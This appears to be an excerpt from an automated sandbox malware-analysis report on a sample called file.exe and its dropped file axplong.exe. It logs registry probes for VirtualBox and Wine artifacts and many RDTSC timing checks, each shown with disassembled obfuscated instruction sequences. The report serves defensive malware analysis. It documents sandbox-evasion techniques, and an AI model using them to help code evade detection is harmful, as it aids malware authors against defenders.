                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5F2E3 second address: D5F2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9C3E second address: EE9C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FA4 second address: EE8FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FAA second address: EE8FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FB4 second address: EE8FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE910E second address: EE9112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE956F second address: EE957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007FD4A4C54696h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAE9F second address: EEAEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAEA5 second address: EEAEE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FD4A4C546A4h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4C5469Ch 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAEE3 second address: EEAEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8670h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAF4E second address: EEAFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD4A4C54698h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007FD4A4C546A7h 0x0000002d call 00007FD4A4C54699h 0x00000032 jnc 00007FD4A4C546A8h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD4A4C5469Bh 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAFCB second address: EEAFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAFD1 second address: EEAFFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FD4A4C5469Eh 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEAFFC second address: EEB001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB001 second address: EEB075 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4C546A0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FD4A4C5469Fh 0x00000013 pop eax 0x00000014 movsx edx, si 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD4A4C54698h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 add dword ptr [ebp+122D25ADh], ebx 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D3972h] 0x00000041 push 00000003h 0x00000043 mov edi, esi 0x00000045 call 00007FD4A4C54699h 0x0000004a pushad 0x0000004b push ebx 0x0000004c je 00007FD4A4C54696h 0x00000052 pop ebx 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB075 second address: EEB0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD4A4ED8679h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB0A1 second address: EEB0B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB0B6 second address: EEB0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB0C4 second address: EEB0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB183 second address: EEB236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD4A4ED8679h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 07F38B51h 0x00000012 pushad 0x00000013 jl 00007FD4A4ED866Ch 0x00000019 mov esi, dword ptr [ebp+122D3A46h] 0x0000001f mov edx, dword ptr [ebp+122D1C2Fh] 0x00000025 popad 0x00000026 push 00000003h 0x00000028 mov di, B704h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D25F3h], ebx 0x00000034 push 00000003h 0x00000036 or ecx, 60972FFDh 0x0000003c call 00007FD4A4ED8669h 0x00000041 push esi 0x00000042 push edx 0x00000043 jmp 00007FD4A4ED8671h 0x00000048 pop edx 0x00000049 pop esi 0x0000004a push eax 0x0000004b jnl 00007FD4A4ED866Ch 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 pushad 0x00000056 push ecx 0x00000057 jnp 00007FD4A4ED8666h 0x0000005d pop ecx 0x0000005e push esi 0x0000005f jo 00007FD4A4ED8666h 0x00000065 pop esi 0x00000066 popad 0x00000067 mov eax, dword ptr [eax] 0x00000069 jc 00007FD4A4ED8673h 0x0000006f jmp 00007FD4A4ED866Dh 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b jo 00007FD4A4ED8666h 0x00000081 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB236 second address: EEB27E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD4A4C546A5h 0x0000000f popad 0x00000010 pop eax 0x00000011 movzx esi, ax 0x00000014 lea ebx, dword ptr [ebp+1245FD9Dh] 0x0000001a mov edx, dword ptr [ebp+122D3962h] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007FD4A4C546A0h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB27E second address: EEB296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB296 second address: EEB2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD4A4C54696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB35D second address: EEB39A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD4A4ED8677h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FD4A4ED866Fh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB39A second address: EEB3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD4A4C54696h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDE82 second address: EFDE88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFDE88 second address: EFDE92 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD4A4C5469Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09DC7 second address: F09DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD4A4ED866Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09DDA second address: F09E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4C546A1h 0x00000009 jmp 00007FD4A4C546A5h 0x0000000e jmp 00007FD4A4C546A2h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FD4A4C5469Ah 0x0000001d push eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 pop eax 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09F48 second address: F09F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8673h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09F5F second address: F09F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A0A1 second address: F0A0B3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4A4ED8666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A0B3 second address: F0A0E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD4A4C546A1h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD4A4C546A2h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A0E0 second address: F0A0F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A24C second address: F0A25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD4A4C5469Dh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A25F second address: F0A27C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD4A4ED8672h 0x00000008 pushad 0x00000009 jbe 00007FD4A4ED8666h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A39B second address: F0A3A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A64E second address: F0A66D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD4A4ED8666h 0x00000008 jmp 00007FD4A4ED8675h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AB83 second address: F0ABBC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD4A4C546ABh 0x00000008 jp 00007FD4A4C54698h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 jnc 00007FD4A4C54696h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jng 00007FD4A4C54696h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01238 second address: F01272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD4A4ED8675h 0x00000018 pop edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f jnc 00007FD4A4ED8668h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0553 second address: EE055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FD4A4C54696h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B2E4 second address: F0B2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B6EB second address: F0B6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B6F6 second address: F0B6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B6FA second address: F0B6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F3DA second address: F0F3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F3E0 second address: F0F3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007FD4A4C54696h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E1D0 second address: F0E1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E1D4 second address: F0E1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E1D8 second address: F0E1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F9C4 second address: F0F9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1331A second address: F1331E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1331E second address: F1332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1332A second address: F13334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEA53 second address: EDEA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1733B second address: F1733F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175D1 second address: F175D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175D5 second address: F175F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8674h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175F4 second address: F175F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F175F9 second address: F17603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17603 second address: F17607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F17912 second address: F17918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19A0E second address: F19A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19A14 second address: F19A76 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FD4A4ED8679h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 jbe 00007FD4A4ED8668h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD4A4ED8668h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c push 438782AFh 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E85 second address: F19E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A543 second address: F1A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A548 second address: F1A55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnp 00007FD4A4C54696h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A55D second address: F1A561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A561 second address: F1A567 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A567 second address: F1A56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A56D second address: F1A571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBB6 second address: F1BBCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBCB second address: F1BBDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBDF second address: F1BBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ECF7 second address: F1ED17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD4A4C54696h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD4A4C5469Dh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ED17 second address: F1ED21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ED21 second address: F1ED5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D3716h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FD4A4C54698h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F754 second address: F1F7CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD4A4ED8668h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jng 00007FD4A4ED867Ah 0x00000033 jmp 00007FD4A4ED8674h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FD4A4ED8668h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ecx 